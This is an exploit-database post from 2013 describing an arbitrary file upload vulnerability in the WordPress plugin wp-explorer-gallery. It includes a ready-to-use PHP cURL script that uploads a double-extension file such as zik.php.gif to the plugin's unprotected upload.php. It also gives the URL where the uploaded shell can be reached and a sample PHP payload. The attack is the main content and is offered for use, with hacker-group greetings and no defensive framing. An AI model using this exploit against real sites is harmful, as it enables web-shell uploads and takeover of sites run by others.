facebook facebook twitter rss

Wordpress plugins - wp-explorer-gallery Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 30-01-2013
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Zikou-16 member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

-----------------------------------------------------------------------
Wordpress plugins - wp-explorer-gallery Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------

#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => nO x)
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/wp-explorer-gallery.zip
####

#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

-----------
#=> Exploit
-----------
<?php
 
$uploadfile
="zik.php.gif";
$ch curl_init("http://[target]/[path]/wp-content/plugins/wp-explorer-gallery/js/swfupload/js/upload.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
array(
'Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads//'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
 
print 
"$postResult";
?>


Shell Access : http://[target]/[path]/wp-content/uploads/random_name.php.gif

<?php
phpinfo
();
?>


------------------------------

Greet'z To #=> KedAns-Dz - JIGsaw - Elite Trojan - Anonymous Algeria - DZMafia & All Inj3ct0r Member <= Th3 End ^_^

# ED82907DAFBB8838 1337day.com [2013-01-30] 04849C3DD9265CD5 #

Like us on Facebook :